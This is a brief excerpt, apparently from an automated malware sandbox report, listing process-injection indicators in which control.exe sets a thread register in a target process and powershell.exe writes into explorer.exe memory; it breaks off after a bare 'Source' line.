Source: C:\Windows\System32\control.exe Thread register set: target process: 5436
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe